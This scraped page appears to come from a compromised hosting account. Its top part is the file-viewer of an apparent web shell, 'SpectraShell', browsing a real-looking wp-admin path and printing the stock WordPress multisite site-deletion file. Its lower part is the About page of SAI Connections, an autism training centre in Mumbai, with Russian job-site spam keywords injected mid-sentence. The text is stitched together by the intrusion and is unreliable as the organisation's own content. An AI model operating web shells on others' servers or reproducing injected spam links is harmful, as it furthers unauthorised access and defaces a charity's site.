🌌 SpectraShell

🌌 SpectraShell

Current path: home/a1642gum/public_html/wp-admin/



⬆️ Go up: public_html

πŸ“„ Viewing: ms-delete-site.php

<?php
/**
 * Multisite delete site panel.
 *
 * @package WordPress
 * @subpackage Multisite
 * @since 3.0.0
 */

require_once __DIR__ . '/admin.php';

if ( ! is_multisite() ) {
	wp_die( __( 'Multisite support is not enabled.' ) );
}

if ( ! current_user_can( 'delete_site' ) ) {
	wp_die( __( 'Sorry, you are not allowed to delete this site.' ) );
}

if ( isset( $_GET['h'] ) && '' !== $_GET['h'] && false !== get_option( 'delete_blog_hash' ) ) {
	if ( hash_equals( get_option( 'delete_blog_hash' ), $_GET['h'] ) ) {
		wpmu_delete_blog( get_current_blog_id() );
		wp_die(
			sprintf(
				/* translators: %s: Network title. */
				__( 'Thank you for using %s, your site has been deleted. Happy trails to you until we meet again.' ),
				get_network()->site_name
			)
		);
	} else {
		wp_die( __( 'Sorry, the link you clicked is stale. Please select another option.' ) );
	}
}

$blog = get_site();
$user = wp_get_current_user();

// Used in the HTML title tag.
$title       = __( 'Delete Site' );
$parent_file = 'tools.php';

require_once ABSPATH . 'wp-admin/admin-header.php';

echo '<div class="wrap">';
echo '<h1>' . esc_html( $title ) . '</h1>';

if ( isset( $_POST['action'] ) && 'deleteblog' === $_POST['action'] && isset( $_POST['confirmdelete'] ) && '1' === $_POST['confirmdelete'] ) {
	check_admin_referer( 'delete-blog' );

	$hash = wp_generate_password( 20, false );
	update_option( 'delete_blog_hash', $hash, false );

	$url_delete = esc_url( admin_url( 'ms-delete-site.php?h=' . $hash ) );

	$switched_locale = switch_to_locale( get_locale() );

	/* translators: Do not translate USERNAME, URL_DELETE, SITENAME, SITEURL: those are placeholders. */
	$content = __(
		"Howdy ###USERNAME###,

You recently clicked the 'Delete Site' link on your site and filled in a
form on that page.

If you really want to delete your site, click the link below. You will not
be asked to confirm again so only click this link if you are absolutely certain:
###URL_DELETE###

If you delete your site, please consider opening a new site here some time in
the future! (But remember that your current site and username are gone forever.)

Thank you for using the site,
All at ###SITENAME###
###SITEURL###"
	);
	/**
	 * Filters the text for the email sent to the site admin when a request to delete a site in a Multisite network is submitted.
	 *
	 * The following strings have a special meaning and will get replaced dynamically:
	 *
	 *  - `###USERNAME###`   The current user's username.
	 *  - `###URL_DELETE###` The link to click on to confirm the site deletion.
	 *  - `###SITENAME###`   The name of the site.
	 *  - `###SITEURL###`    The URL to the site.
	 *
	 * @since 3.0.0
	 *
	 * @param string $content The email text.
	 */
	$content = apply_filters( 'delete_site_email_content', $content );

	$content = str_replace( '###USERNAME###', $user->user_login, $content );
	$content = str_replace( '###URL_DELETE###', $url_delete, $content );
	$content = str_replace( '###SITENAME###', get_network()->site_name, $content );
	$content = str_replace( '###SITEURL###', network_home_url(), $content );

	wp_mail(
		get_option( 'admin_email' ),
		sprintf(
			/* translators: %s: Site title. */
			__( '[%s] Delete My Site' ),
			wp_specialchars_decode( get_option( 'blogname' ) )
		),
		$content
	);

	if ( $switched_locale ) {
		restore_previous_locale();
	}
	?>

	<p><?php _e( 'Thank you. Please check your email for a link to confirm your action. Your site will not be deleted until this link is clicked.' ); ?></p>

	<?php
} else {
	?>
	<p>
	<?php
		printf(
			/* translators: %s: Network title. */
			__( 'If you do not want to use your %s site any more, you can delete it using the form below. When you click <strong>Delete My Site Permanently</strong> you will be sent an email with a link in it. Click on this link to delete your site.' ),
			get_network()->site_name
		);
	?>
	</p>
	<p><?php _e( 'Remember, once deleted your site cannot be restored.' ); ?></p>

	<form method="post" name="deletedirect">
		<?php wp_nonce_field( 'delete-blog' ); ?>
		<input type="hidden" name="action" value="deleteblog" />
		<p><input id="confirmdelete" type="checkbox" name="confirmdelete" value="1" /> <label for="confirmdelete"><strong>
		<?php
			printf(
				/* translators: %s: Site address. */
				__( "I'm sure I want to permanently delete my site, and I am aware I can never get it back or use %s again." ),
				$blog->domain . $blog->path
			);
		?>
		</strong></label></p>
		<?php submit_button( __( 'Delete My Site Permanently' ) ); ?>
	</form>
	<?php
}
echo '</div>';

require_once ABSPATH . 'wp-admin/admin-footer.php';



πŸ“

About SAI Connections

SAI Connections is an autism awareness and Ρ€Π°Π±ΠΎΡ‚Π° Π² москвС training centre constantly working towards empowering individuals with autism spectrum disorder to live more purposeful and fulfilling lives. We also empower parents and siblings of affected jobitel com individuals to enjoy more wholesome family lives.

 

For over a decade, we have helped parents understand what autism is, and provided high quality international education to children and individuals on the autism spectrum. The encouraging results and optimism in all individuals and guardians after completing the training is the force that continues to drive us.

 

SAI Connections educates individuals with autism spectrum disorder to develop their strengths, adjust to their surroundings, and live more fulfilling lives. We also conduct training programs for parents and families of affected children to understand the child better and help him/her progress accordingly. We uniquely treat autism spectrum disorder (and all its forms like Asperger’s Syndrome, PDD-NOS and more) by remediating the core deficits and co-occurring conditions accompanying autism.

 

We also provide training and certification to professionals who want to help individuals and families affected by conditions where the guided participation between a parent and child is affected, like autism (including Asperger’s), ADHD, Tourette’s Syndrome and other developmental difficulties.

 

We at SAI Connections, follow techniques which are effective in not only helping a child develop to live independently and adjust better to his/her surroundings, but also in empowering his/her parents to become effective guides and experiencing a wholesome family life. The techniques we use are:

 

  1. Relationship Development Intervention (RDI)

    Designed by Drs. Rachelle Sheely and Steven Gutstein in USA, RDI is a family-based training program. It addresses the core deficits of autism and ADHD, and involves parents, who play the most important role in a child’s development. Through RDI, we imbibe traits of motivation, emotional sharing, co-regulation, social referencing and more in children with autism, ADHD and other learning disabilities. This program also empowers parents to enjoy seamless interaction with their child instead of helplessly watching by the sidelines.

  2. Applied Behavior Analysis (ABA)

    ABA is the application of the principles of learning and motivation from Behavior Analysis (the scientific study of behavior), and the procedures and technology derived from those principles, to the solution of problems of social significance. ABA techniques are used to teach skills including skills of Daily Living.Behavior plans are written out and implemented by Kamini Lakhani using this technique

VISION AND MISSION

Vision1

AΒ world where individuals on the autism spectrum live respectfully within society and can achieve a quality of life which is every human being’s birthright.

mission1

Our mission is to provide proven and high quality education to individuals on autism spectrum disorder and provide them with meaningful employment, and empower them to live independently.

THE FOUNDER

Kamini Lakhani RDI Consultant and Autism Expert

Support for Autistic Individuals (SAI Connections) was founded by Mrs. Kamini Lakhani in 2004 in Mumbai, India.

 

Kamini has been providing services in the field of autism, including Asperger’s Syndrome and Pervasive Developmental Disorder (PDD) for more than 20 years. She is the authorized Director of Professional Training, Relationship Development Intervention (RDI) in India and the Middle East, and a Behavioral Analyst. She is a member of the Resource Committee for the Forum for Autism (FFA) and a core committee member of China Gate – a support group for children with learning disabilities and their families.

 

Being the mother of a child (now young adult) on the spectrum, she understands the challenges encountered by parents of similarly abled children. Her aim is to empower families and create meaningful changes for those affected by ASD and other neuro developmental difficulties.

 

Kamini is an advocate for autism awareness and empowerment. Her efforts are consistently aimed at empowering autistic individuals to understand their potential and creating opportunities for jobs for autistic adults. You can contact her here.

INTERNATIONAL CONSULTANTS

Dr. Rachelle K. Sheely

The President of RDI Connect. Dr. Rachelle Sheely has been a leader in developmental and and logistical implementation of programs for families and professionals working with children and individuals with developmental difficulties.

Dr. Steven E. Gutstein

Dr. Steven Gutstein is the developer of RDI Connect and an internationally acclaimed pioneer in the field of developmental difficulties. He has over twenty years of high-quality experience.

OUR TEAM

Dr. Scherezade Ness Tata-Irani

M.B.B.S, OBGYN and is currently training as an RDI Consultant, under the supervision of Mrs. Kamini Lakhani. She is practicing her RDI Consultations through SAI Connections

Nitin Nikam

Nitin came into this field by accident 4 years ago, and he has been with SAI Connections ever since. He loves working with the children and feels relaxed and comfortable in their presence.

Nutan Haldankar

Nutan has recently joined as an administrator at SAI Connections. She gets to learn from students every day, and believes that they have blessed her with positivity in life.

Samidha Bhagat

Samidha is the training coordinator at SAI Connections since more than 2 years. She started her career in the hotel industry and an NGO. She loves the positive vibes circulating at SAI Connections.

Dipali Chauhan

Dipali is currently training as an RDI Consultant, under the supervision of Mrs. Kamini Lakhani. She has M. A. degree. in Counselling Psychology, E.C.C.E. and has been a part of SAI Connections from last 5 years.

Jasvinder Kaur Bhatia

Jasvinder is the RDI Certified Consultant (Relationship Development Intervention) and has been working as an educator with SAI for the last 10 years. She is a mother of a teenager on the spectrum and believes in empowering parents to deal with Autism.